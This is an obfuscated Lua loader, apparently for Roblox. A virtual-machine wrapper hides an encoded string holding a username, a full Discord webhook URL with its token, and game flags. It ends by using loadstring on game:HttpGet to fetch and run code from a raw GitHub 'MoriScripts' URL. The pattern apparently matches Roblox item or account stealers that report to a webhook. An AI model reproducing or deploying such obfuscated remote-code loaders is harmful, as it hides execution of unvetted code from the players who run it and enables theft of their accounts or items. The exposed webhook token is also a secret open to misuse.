--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.12) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v68=(v31/(((5 + 0) -3)^(v32-(1 + 0))))%((5 -(1 + 2))^(((v33-(878 -(282 + 595))) -(v32-(1 -0))) + (2 -1))) ;return v68-(v68%(620 -(555 + (1021 -(892 + 65))))) ;else local v69=(1067 -((162 -94) + 997))^(v32-(932 -(857 + 74))) ;return (((v31%(v69 + v69))>=v69) and (4 -(5 -2))) or (568 -(367 + 201)) ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + (4 -1) );v19=v19 + (354 -(87 + 263)) ;return (v37 * (16777396 -(67 + 113))) + (v36 * (48056 + 12856 + 4624)) + (v35 * (628 -372)) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=0;local v39;local v40;local v41;local v42;local v43;local v44;local v45;while true do if (v38~=3) then else v45=nil;while true do local v76=0;local v77;while true do if ((0 -0)==v76) then v77=0 + 0 ;while true do if (v77~=1) then else if (v39~=3) then else local v105=0 + 0 ;while true do if (v105~=(0 -0)) then else for v123=1 + 0 ,v24() do v41[v123-1 ]=v29();end return v43;end end end if (v39~=(1132 -(87 + 1043))) then else local v106=0;while true do if (v106==(448 -(10 + 438))) then for v125=1 + 0 ,v44 do local v126=0 -0 ;local v127;local v128;while true do if (v126~=(0 + 0)) then else v127=v22();v128=nil;v126=1181 -(1123 + 57) ;end if (v126==1) then if (v127==(1 + 0)) then v128=v22()~=(254 -(163 + 91)) ;elseif (v127==2) then v128=v25();elseif (v127==(1933 -(1869 + 61))) then v128=v26();end v45[v125]=v128;break;end end end v43[1 + 2 ]=v22();v106=3 -2 ;end if ((1 -0)==v106) then for v129=1,v24() do local v130=0;local v131;local v132;while true do if (v130==(1 + 0)) then while true do if (0~=v131) then else v132=v22();if (v21(v132,1 -0 ,1)~=0) then else local v173=0 + 0 ;local v174;local v175;local v176;while true do if (v173==(1476 -(1329 + 145))) then local v177=0;while true do if (1~=v177) then else v173=3;break;end if (v177==0) then if (v21(v175,1,1)==1) then v176[2]=v45[v176[973 -(140 + 831) ]];end if (v21(v175,1852 -(1409 + 441) ,2)~=(719 -(15 + 703))) then else v176[3]=v45[v176[3]];end v177=1 + 0 ;end end end if (v173~=0) then else v174=v21(v132,2,3);v175=v21(v132,442 -(262 + 176) ,6);v173=1;end if ((1722 -(345 + 1376))~=v173) then else local v178=688 -(198 + 490) ;while true do if (v178==(0 -0)) then local v182=0 -0 ;while true do if (v182~=(1206 -(696 + 510))) then else v176={v23(),v23(),nil,nil};if (v174==0) then local v187=1262 -(1091 + 171) ;local v188;local v189;local v190;while true do if (v187~=(1 + 0)) then else v190=nil;while true do if ((0 -0)~=v188) then else v189=0;v190=nil;v188=3 -2 ;end if (v188~=1) then else while true do if (v189~=(374 -(123 + 251))) then else v190=0 -0 ;while true do if (v190~=0) then else v176[3]=v23();v176[4]=v23();break;end end break;end end break;end end break;end if (0~=v187) then else v188=0;v189=nil;v187=699 -(208 + 490) ;end end elseif (v174==(1 + 0)) then v176[3]=v24();elseif (v174==2) then v176[3]=v24() -((1 + 1)^16) ;elseif (v174==3) then local v193=836 -(660 + 176) ;local v194;local v195;while true do if (v193~=0) then else v194=0 + 0 ;v195=nil;v193=1;end if (v193~=1) then else while true do if (v194==(202 -(14 + 188))) then v195=675 -(534 + 141) ;while true do if (v195~=0) then else v176[2 + 1 ]=v24() -(2^16) ;v176[4 + 0 ]=v23();break;end end break;end end break;end end end v182=1 + 0 ;end if (v182~=(1 -0)) then else v178=1;break;end end end if (v178==1) then v173=2 -0 ;break;end end end if (v173~=3) then else if (v21(v175,3,3)==(2 -1)) then v176[3 + 1 ]=v45[v176[3 + 1 ]];end v40[v129]=v176;break;end end end break;end end break;end if (v130==(396 -(115 + 281))) then v131=0 -0 ;v132=nil;v130=1 + 0 ;end end end v39=7 -4 ;break;end end end break;end if (v77~=0) then else if (v39~=1) then else local v107=0 -0 ;while true do if (v107~=(868 -(550 + 317))) then else v45={};v39=2 -0 ;break;end if ((0 -0)==v107) then v43={v40,v41,nil,v42};v44=v24();v107=1;end end end if (v39~=0) then else local v108=285 -(134 + 151) ;while true do if (v108==0) then v40={};v41={};v108=1666 -(970 + 695) ;end if (v108==1) then v42={};v39=1;break;end end end v77=1 -0 ;end end break;end end end break;end if (v38==2) then v43=nil;v44=nil;v38=1993 -(582 + 1408) ;end if (v38~=0) then else v39=0 -0 ;v40=nil;v38=1;end if (v38==(1 -0)) then v41=nil;v42=nil;v38=7 -5 ;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v46=v24();local v47=v24();local v48=1 + 0 ;local v49=(v21(v47,1 -0 ,1844 -(1195 + 629) ) * ((1583 -(1535 + 46))^(41 -9))) + v46 ;local v50=v21(v47,(754 -492) -(187 + 54) ,811 -(162 + 618) );local v51=((v21(v47,23 + 9 )==(1 + 0 + 0)) and  -(1 -0)) or (1 -(1024 -(706 + 318))) ;if (v50==(0 + 0)) then if (v49==0) then return v51 * (0 -0) ;else local v78=0 + 0 ;while true do if (((2887 -(721 + 530)) -(1373 + 263))==v78) then v50=1001 -(451 + (1820 -(945 + 326))) ;v48=0;break;end end end elseif (v50==(647 + 1400)) then return ((v49==(0 -0)) and (v51 * ((1 -0)/(1456 -(282 + 1174))))) or (v51 * NaN) ;end return v8(v51,v50-(2555 -1532) ) * (v48 + (v49/((1386 -(746 + 638))^52))) ;end v26=nil;function v26(v52)local v53=(0 -0) + 0 ;local v54;local v55;while true do if (v53==2) then v55={};for v79=701 -(271 + (1226 -797)) , #v54 do v55[v79]=v2(v1(v3(v54,v79,v79)));end v53=3 + 0 ;end if ((1501 -(1408 + 92))==v53) then v54=v3(v16,v19,(v19 + v52) -(1087 -(461 + 625)) );v19=v19 + v52 ;v53=(3190 -(106 + 1794)) -(993 + 295) ;end if (v53==(0 + 0)) then v54=nil;if  not v52 then v52=v24();if (v52==((560 + 1209) -(1749 + 20))) then return "";end end v53=1172 -(418 + 753) ;end if (v53==(1325 -(446 + 803 + (1218 -(466 + 679))))) then return v6(v55);end end end v18=5;end if (v18==2) then function v22()local v56=0 -0 ;local v57;while true do if (v56==0) then v57=v1(v16,v19,v19);v19=v19 + (2 -1) ;v56=115 -(4 + 110) ;end if (v56==(585 -((1484 -(41 + 1386)) + 527))) then return v57;end end end v23=nil;function v23()local v58,v59=v1(v16,v19,v19 + (105 -(17 + 86)) );v19=v19 + 2 + 0 ;return (v59 * (570 -314)) + v58 ;end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v60)if (v1(v60,2)==79) then local v70=0;while true do if (v70==0) then v20=v0(v3(v60,1,1));return "";end end else local v71=0;local v72;while true do if (v71==0) then v72=v2(v0(v60,16));if v20 then local v97=0;local v98;while true do if (v97==1) then return v98;end if (v97==0) then v98=v5(v72,v20);v20=nil;v97=1;end end else return v72;end break;end end end end);v18=1;end if (v18==7) then function v30(v61,v62,v63)local v64=0;local v65;local v66;local v67;while true do if (0==v64) then v65=v61[1];v66=v61[2];v64=1;end if (1==v64) then v67=v61[3];return function(...)local v81=v65;local v82=v66;local v83=v67;local v84=v28;local v85=1;local v86= -1;local v87={};local v88={...};local v89=v12("#",...) -1 ;local v90={};local v91={};for v95=0,v89 do if (v95>=v83) then v87[v95-v83 ]=v88[v95 + 1 ];else v91[v95]=v88[v95 + 1 ];end end local v92=(v89-v83) + 1 ;local v93;local v94;while true do local v96=0;while true do if (v96==1) then if (v94<=5) then if (v94<=2) then if (v94<=0) then local v109=v93[2];local v110=v91[v93[3]];v91[v109 + 1 ]=v110;v91[v109]=v110[v93[4]];elseif (v94==1) then v91[v93[2]]();else do return;end end elseif (v94<=3) then local v114=0;local v115;local v116;local v117;local v118;while true do if (v114==1) then v86=(v117 + v115) -1 ;v118=0;v114=2;end if (v114==0) then v115=v93[2];v116,v117=v84(v91[v115](v13(v91,v115 + 1 ,v93[3])));v114=1;end if (v114==2) then for v167=v115,v86 do v118=v118 + 1 ;v91[v167]=v116[v118];end break;end end elseif (v94>4) then local v133=0;local v134;while true do if (v133==0) then v134=v93[2];v91[v134]=v91[v134](v13(v91,v134 + 1 ,v86));break;end end else v91[v93[2]]=v93[3];end elseif (v94<=8) then if (v94<=6) then v63[v93[3]]=v91[v93[2]];elseif (v94==7) then v91[v93[2]]=v93[3];v85=v85 + 1 ;v93=v81[v85];v63[v93[3]]=v91[v93[2]];v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]=v93[3];v85=v85 + 1 ;v93=v81[v85];v63[v93[3]]=v91[v93[2]];v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]=v93[3];v85=v85 + 1 ;v93=v81[v85];v63[v93[3]]=v91[v93[2]];v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]=v63[v93[3]];v85=v85 + 1 ;v93=v81[v85];v91[v93[2]][v93[3]]=v93[4];v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]=v63[v93[3]];v85=v85 + 1 ;v93=v81[v85];v91[v93[2]][v93[3]]=v93[4];else local v143;local v144,v145;local v146;local v147;v91[v93[2]][v93[3]]=v93[4];v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]=v63[v93[3]];v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]=v63[v93[3]];v85=v85 + 1 ;v93=v81[v85];v147=v93[2];v146=v91[v93[3]];v91[v147 + 1 ]=v146;v91[v147]=v146[v93[4]];v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]=v93[3];v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]=v93[3]~=0 ;v85=v85 + 1 ;v93=v81[v85];v147=v93[2];v144,v145=v84(v91[v147](v13(v91,v147 + 1 ,v93[3])));v86=(v145 + v147) -1 ;v143=0;for v164=v147,v86 do v143=v143 + 1 ;v91[v164]=v144[v143];end v85=v85 + 1 ;v93=v81[v85];v147=v93[2];v91[v147]=v91[v147](v13(v91,v147 + 1 ,v86));v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]();v85=v85 + 1 ;v93=v81[v85];do return;end end elseif (v94<=9) then v91[v93[2]]=v93[3]~=0 ;elseif (v94==10) then v91[v93[2]][v93[3]]=v93[4];else v91[v93[2]]=v63[v93[3]];end v85=v85 + 1 ;break;end if (0==v96) then v93=v81[v85];v94=v93[1];v96=1;end end end end;end end end return v30(v29(),{},v17)(...);end end end v15("LOL!0E3O0003083O00557365724E616D65030A3O0047616C617869735F343803073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3133313238303736303732393530313730362F7337663047545A3855323642707339734D547772775142334946316736745158425847614E7052554F33322O44515930356854785F68337A356A704965522O2D3349586103093O00557365724E616D653203023O005F47030D3O004C6F6164696E675363722O656E2O0103093O00416E74694C6561766503093O004D6F7573654C6F636B030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A00153O0012073O00023O00124O00013O00124O00043O00124O00033O00124O00023O00124O00053O00124O00063O00304O0007000800124O00063O00304O0009000800120B3O00063O0030083O000A000800124O000B3O00122O0001000C3O00202O00010001000D00122O0003000E6O000400016O000100049O0000026O000100016O00017O00",v9(),...);
